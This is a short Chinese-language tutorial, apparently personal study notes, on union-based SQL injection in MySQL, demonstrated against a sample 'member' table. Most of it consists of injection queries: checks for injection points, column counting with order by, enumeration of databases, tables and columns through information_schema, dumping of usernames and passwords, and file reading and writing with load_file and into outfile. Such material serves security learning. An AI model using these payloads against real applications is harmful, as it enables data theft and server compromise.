SQL注入命令执行
member 表如下
查询数据库版本,数据库名字,用户名,操作系统
select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
判断注入点—报错查询
select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
group_concat 查询
将查询的内容连在一起,列如
select group_concat(username,pw) from member where id=1;
limit 查询
limit 0,1指返回第一列;limit 1,1指返回第二列;limit 1,2 指显示从第二行开始,显示两列
如下图:
order by 查询字段数
当查询的字段数小于查询对象的字段数时,则返回正确;如大于时,则返回错误,如下图:
union 查询
查询数据库名字,这里字段数要与查询的第一个对象相同,(如例子中的要与member字段数相同)否则查询错误
select * from member where id=1 union select database(),1,2;
select * from member where id=1 union select database(),1,2,3;
select * from member where id=-1 union select database(),1,2,3;
查询结果为当前的数据库名字为mysql;
查询数据库名
在mysql5.0以上版本存在一个 information_schema的数据库,它记录着所有的数据库,表明,列名。
select * from member where id=-1 union select group_concat(schema_name),2,3,4 from information_schema.schemata;
查询mysql数据库下的表名
select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema='mysql';
select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema=database();
select * from member where id=-1 union select group_concat(table_name),1,2,3 from information_schema.tables where table_schema='mysql';
报错—列数不对
查询mysql数据库下的表名
select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='goods_tb'
select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='member'
查询具体数据
select * from member where id=-1 union select id,username,pw,sex from member;
跨当前数据库查询其他数据库的名字
列如当前数据库为mysql,要查询另一个数据库world 下的表city
select * from world.city;
load_file():读取函数
select * from member where id=-1 union select load_file('d:/text.txt'),2,3,4;
into outfile或iinto dumpfile:导出函数
select 'x' into outfile 'd:/filename.txt';